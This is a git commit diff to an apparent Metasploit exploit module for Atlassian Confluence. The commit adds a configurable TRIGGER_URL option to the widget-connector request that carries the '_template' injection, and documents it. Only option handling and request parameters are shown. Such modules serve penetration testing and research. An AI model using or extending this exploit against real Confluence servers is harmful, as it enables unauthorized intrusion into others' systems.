Added TRIGGER_URL option
parent
91eb29b1fe
commit
82def16953
|
@ -30,6 +30,7 @@ List the steps needed to make sure this thing works
|
||||||
|
|
||||||
# Options
|
# Options
|
||||||
- **TARGETURI**: Path to Atlassian Confluence installation ("/" is the default)
|
- **TARGETURI**: Path to Atlassian Confluence installation ("/" is the default)
|
||||||
|
- **TRIGGER_URL**: Url to external video service to trigger vulnerability ("https://www.youtube.com/watch?v=dQw4w9WgXcQ" is the default)
|
||||||
|
|
||||||
# Scenario
|
# Scenario
|
||||||
## Tested on Confluence 6.8.2 with Windows target
|
## Tested on Confluence 6.8.2 with Windows target
|
||||||
|
|
|
@ -59,7 +59,9 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
|
|
||||||
register_options(
|
register_options(
|
||||||
[
|
[
|
||||||
OptString.new('TARGETURI', [true, 'The base to Confluence', '/'])
|
OptString.new('TARGETURI', [true, 'The base to Confluence', '/']),
|
||||||
|
OptString.new('TRIGGER_URL', [true, 'Url to external video service to trigger vulnerability',
|
||||||
|
'https://www.youtube.com/watch?v=dQw4w9WgXcQ'])
|
||||||
])
|
])
|
||||||
end
|
end
|
||||||
|
|
||||||
|
@ -212,7 +214,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
'name' => 'widget',
|
'name' => 'widget',
|
||||||
'body' => '',
|
'body' => '',
|
||||||
'params' => {
|
'params' => {
|
||||||
'url' => 'https://www.youtube.com/watch?v=dQw4w9WgXcQ',
|
'url' => datastore['TRIGGER_URL'],
|
||||||
'_template' => service_url
|
'_template' => service_url
|
||||||
}
|
}
|
||||||
|
|
||||||
|
|
Loading…
Reference in New Issue